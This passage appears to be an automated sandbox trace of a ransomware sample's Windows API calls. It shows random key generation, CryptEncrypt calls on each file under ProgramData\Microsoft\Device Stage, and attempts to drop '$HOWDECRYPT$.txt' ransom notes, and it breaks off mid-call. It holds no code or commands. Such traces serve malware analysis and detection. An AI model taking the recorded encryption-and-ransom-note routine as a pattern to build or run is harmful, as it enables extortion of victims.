[0160.467] GetProcessHeap () returned 0x2c0000 [0160.467] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.467] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248eb38*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248eb38*=0x30) returned 1 [0160.468] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.468] GetProcessHeap () returned 0x2c0000 [0160.468] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.468] GetProcessHeap () returned 0x2c0000 [0160.468] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4b148 | out: hHeap=0x2c0000) returned 1 [0160.468] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248eb38 | out: pbBuffer=0x248eb38) returned 1 [0160.468] GetProcessHeap () returned 0x2c0000 [0160.468] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.468] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248eb30*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248eb30*=0x30) returned 1 [0160.468] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.468] GetProcessHeap () returned 0x2c0000 [0160.468] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.468] GetProcessHeap () returned 0x2c0000 [0160.468] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f29340 | out: hHeap=0x2c0000) returned 1 [0160.468] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248eb38 | out: pbBuffer=0x248eb38) returned 1 [0160.468] GetProcessHeap () returned 0x2c0000 [0160.468] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.468] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248eb30*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248eb30*=0x30) returned 1 [0160.469] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.469] GetProcessHeap () returned 0x2c0000 [0160.469] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.469] GetProcessHeap () returned 0x2c0000 [0160.469] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f29228 | out: hHeap=0x2c0000) returned 1 [0160.469] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248eb30 | out: pbBuffer=0x248eb30) returned 1 [0160.469] GetProcessHeap () returned 0x2c0000 [0160.469] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.469] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248eb28*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248eb28*=0x30) returned 1 [0160.469] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.469] GetProcessHeap () returned 0x2c0000 [0160.469] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.469] GetProcessHeap () returned 0x2c0000 [0160.469] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4b040 | out: hHeap=0x2c0000) returned 1 [0160.469] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248eb30 | out: pbBuffer=0x248eb30) returned 1 [0160.469] GetProcessHeap () returned 0x2c0000 [0160.469] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.469] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248eb28*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248eb28*=0x30) returned 1 [0160.469] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.470] GetProcessHeap () returned 0x2c0000 [0160.470] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.470] GetProcessHeap () returned 0x2c0000 [0160.470] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f29110 | out: hHeap=0x2c0000) returned 1 [0160.470] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248eb28 | out: pbBuffer=0x248eb28) returned 1 [0160.470] GetProcessHeap () returned 0x2c0000 [0160.470] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.470] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248eb20*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248eb20*=0x30) returned 1 [0160.470] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.470] GetProcessHeap () returned 0x2c0000 [0160.470] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.470] GetProcessHeap () returned 0x2c0000 [0160.470] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f49fa8 | out: hHeap=0x2c0000) returned 1 [0160.470] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248eb28 | out: pbBuffer=0x248eb28) returned 1 [0160.470] GetProcessHeap () returned 0x2c0000 [0160.470] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.470] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248eb20*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248eb20*=0x30) returned 1 [0160.470] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.470] GetProcessHeap () returned 0x2c0000 [0160.471] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.471] GetProcessHeap () returned 0x2c0000 [0160.471] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f28ff8 | out: hHeap=0x2c0000) returned 1 [0160.471] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248eb20 | out: pbBuffer=0x248eb20) returned 1 [0160.471] GetProcessHeap () returned 0x2c0000 [0160.471] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.471] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248eb18*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248eb18*=0x30) returned 1 [0160.471] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.471] GetProcessHeap () returned 0x2c0000 [0160.471] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.471] GetProcessHeap () returned 0x2c0000 [0160.471] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f28ee0 | out: hHeap=0x2c0000) returned 1 [0160.471] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\$HOWDECRYPT$.txt" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.471] GetProcessHeap () returned 0x2c0000 [0160.471] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f49e80 | out: hHeap=0x2c0000) returned 1 [0160.471] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248eb18 | out: pbBuffer=0x248eb18) returned 1 [0160.471] GetProcessHeap () returned 0x2c0000 [0160.472] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.472] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248eb10*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248eb10*=0x30) returned 1 [0160.472] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\resource.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.472] GetProcessHeap () returned 0x2c0000 [0160.472] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.472] GetProcessHeap () returned 0x2c0000 [0160.472] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f49d58 | out: hHeap=0x2c0000) returned 1 [0160.472] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\$HOWDECRYPT$.txt" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.472] GetProcessHeap () returned 0x2c0000 [0160.472] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f28dc8 | out: hHeap=0x2c0000) returned 1 [0160.472] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248eb10 | out: pbBuffer=0x248eb10) returned 1 [0160.472] GetProcessHeap () returned 0x2c0000 [0160.472] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.472] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248eb08*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248eb08*=0x30) returned 1 [0160.473] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.473] GetProcessHeap () returned 0x2c0000 [0160.473] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.473] GetProcessHeap () returned 0x2c0000 [0160.473] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4af38 | out: hHeap=0x2c0000) returned 1 [0160.473] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248eb10 | out: pbBuffer=0x248eb10) returned 1 [0160.473] GetProcessHeap () returned 0x2c0000 [0160.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.473] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248eb08*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248eb08*=0x30) returned 1 [0160.473] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.473] GetProcessHeap () returned 0x2c0000 [0160.473] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.473] GetProcessHeap () returned 0x2c0000 [0160.473] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4ae30 | out: hHeap=0x2c0000) returned 1 [0160.473] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248eb08 | out: pbBuffer=0x248eb08) returned 1 [0160.473] GetProcessHeap () returned 0x2c0000 [0160.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.473] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248eb00*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248eb00*=0x30) returned 1 [0160.473] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.474] GetProcessHeap () returned 0x2c0000 [0160.474] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.474] GetProcessHeap () returned 0x2c0000 [0160.474] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4ad28 | out: hHeap=0x2c0000) returned 1 [0160.474] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248eb08 | out: pbBuffer=0x248eb08) returned 1 [0160.474] GetProcessHeap () returned 0x2c0000 [0160.474] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.474] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248eb00*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248eb00*=0x30) returned 1 [0160.474] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.474] GetProcessHeap () returned 0x2c0000 [0160.474] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.474] GetProcessHeap () returned 0x2c0000 [0160.474] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f28cb0 | out: hHeap=0x2c0000) returned 1 [0160.474] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248eb00 | out: pbBuffer=0x248eb00) returned 1 [0160.474] GetProcessHeap () returned 0x2c0000 [0160.474] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.474] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248eaf8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248eaf8*=0x30) returned 1 [0160.475] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.475] GetProcessHeap () returned 0x2c0000 [0160.475] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.475] GetProcessHeap () returned 0x2c0000 [0160.475] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f28b98 | out: hHeap=0x2c0000) returned 1 [0160.475] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248eb00 | out: pbBuffer=0x248eb00) returned 1 [0160.475] GetProcessHeap () returned 0x2c0000 [0160.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.475] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248eaf8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248eaf8*=0x30) returned 1 [0160.475] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.475] GetProcessHeap () returned 0x2c0000 [0160.475] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.475] GetProcessHeap () returned 0x2c0000 [0160.475] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f28a80 | out: hHeap=0x2c0000) returned 1 [0160.475] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248eaf8 | out: pbBuffer=0x248eaf8) returned 1 [0160.475] GetProcessHeap () returned 0x2c0000 [0160.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.475] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248eaf0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248eaf0*=0x30) returned 1 [0160.476] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.476] GetProcessHeap () returned 0x2c0000 [0160.476] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.476] GetProcessHeap () returned 0x2c0000 [0160.476] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f28968 | out: hHeap=0x2c0000) returned 1 [0160.476] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248eaf8 | out: pbBuffer=0x248eaf8) returned 1 [0160.476] GetProcessHeap () returned 0x2c0000 [0160.476] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.476] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248eaf0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248eaf0*=0x30) returned 1 [0160.476] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.476] GetProcessHeap () returned 0x2c0000 [0160.476] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.476] GetProcessHeap () returned 0x2c0000 [0160.476] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f28850 | out: hHeap=0x2c0000) returned 1 [0160.476] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248eaf0 | out: pbBuffer=0x248eaf0) returned 1 [0160.476] GetProcessHeap () returned 0x2c0000 [0160.476] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.476] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248eae8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248eae8*=0x30) returned 1 [0160.476] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.477] GetProcessHeap () returned 0x2c0000 [0160.477] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.477] GetProcessHeap () returned 0x2c0000 [0160.477] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f28738 | out: hHeap=0x2c0000) returned 1 [0160.477] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\$HOWDECRYPT$.txt" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.477] GetProcessHeap () returned 0x2c0000 [0160.477] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f49c30 | out: hHeap=0x2c0000) returned 1 [0160.477] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248eae8 | out: pbBuffer=0x248eae8) returned 1 [0160.477] GetProcessHeap () returned 0x2c0000 [0160.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.477] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248eae0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248eae0*=0x30) returned 1 [0160.477] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\resource.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.477] GetProcessHeap () returned 0x2c0000 [0160.477] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.477] GetProcessHeap () returned 0x2c0000 [0160.477] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f49b08 | out: hHeap=0x2c0000) returned 1 [0160.477] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\$HOWDECRYPT$.txt" (normalized: 